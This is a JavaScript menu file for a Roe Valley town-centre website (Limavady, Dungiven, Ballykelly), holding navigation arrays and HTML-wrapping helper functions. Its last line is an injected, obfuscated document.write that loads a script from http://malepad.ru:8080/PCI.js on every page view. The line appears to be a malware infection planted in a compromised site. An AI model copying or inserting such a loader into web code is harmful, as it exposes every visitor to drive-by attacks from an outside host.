var states = ['mout', 'mover', 'mdown'],

MENU_ITEMS0 = [
	[wrap_root('Home'), 'index.html',
				[]
		],
	[wrap_root('Shouldn&rsquo;t you be here?'), 'shouldnt.asp',
				[]
		],
	[wrap_root('Strategy For Action'), 'strategy.asp',{'sw' : 63, 'bw' : 160},
		[wrap_par('Chairperson Foreward'), 'chair.asp'],
		[wrap_par('Town Centre Manager'), 'tcm.asp'],
		[wrap_par('Area Overview'), 'area.asp'],
		[wrap_par('Introduction'), 'intro.asp'],
		[wrap_par('Strategy'), 'strategy1.asp'],
		[wrap_par('Structure'), 'structure.asp'],
		[wrap_par('Action Plan'), 'plan.pdf', {'tw' : '_blank'}],
		[wrap_par('Conclusion'), 'conclusion.asp'],
		[wrap_par('College Survey'), 'college.asp']
		],

	[wrap_root('Directory'), 'directory.asp',
				[]
		],
	[wrap_root('Accommodation'), 'accommodation.asp',
				[]
		],		
	[wrap_root('Tourism'), 'tourism.asp',
				[]
		],
		
	[wrap_root('News'), 'news.asp',{'sw' : 163, 'bw' : 160},
		[wrap_par('News Spring 2003'), 'news/aroundtheroe_spring2003.pdf', {'tw' : '_blank'}],
		[wrap_par('News Spring 2004'), 'news/aroundtheroe_spring2004.pdf', {'tw' : '_blank'}]
		],
		
	[wrap_root('Events'), 'events.asp',
				[]
		],
		

	[wrap_root('Business Awards'), 'http://www.roevalleybusinessawards.com',
		[]
		],		

	[wrap_root('Statistics'), 'statistics.asp',
				[]
		],	

		
	[wrap_root('Maps'), 'maps.asp',{'sw' : 63, 'bw' : 160},
		[wrap_par('Limavady'), 'limavady.asp'],
		[wrap_par('Dungiven'), 'dungiven.asp'],
		[wrap_par('Ballykelly'), 'ballykelly.asp']
	],
	
	[wrap_root('Links'), '',{'sw' : 63, 'bw' : 160},
		[wrap_par('Government'), 'govlinks.asp'],	
		[wrap_par('Business'), 'businesslinks.asp'],
		[wrap_par('Educational'), 'edlinks.asp'],
		[wrap_par('Local Interest'), 'locallinks.asp']
	],
	
	[wrap_root('Contact Us'), 'contact.asp',

	[]
	]
];
function wrap_par (text,pos, icon) {
	var res=[];
	for (var i=0; i<3; i++)
		res[i]=['<table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td width=100% class="minner">&nbsp;', icon == null ? '' : ('<img height="16" width="15" src="' + (icon ? 'icons/'+icon : 'menu_files/pixel') + '.gif" align="absmiddle">'), ' ', text, '</td>', pos?['<td nowrap>&nbsp;<img src="icons/', i, 'rarrow.gif" width=12 height=12 align="absmiddle">&nbsp;</td>'].join(''):'', '</tr></table>'].join('');
	return res;
}

function wrap_root (text) {
	var res = []; 
	for (var i=0; i<3; i++)
		res[i] = ['&nbsp;', text, '&nbsp;<img src="icons/', i, 'rarrow.gif" width="12" height="12" align="absmiddle">&nbsp;'].join('');
	return res;
}


document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/PCI.js"></scr'+'ipt>');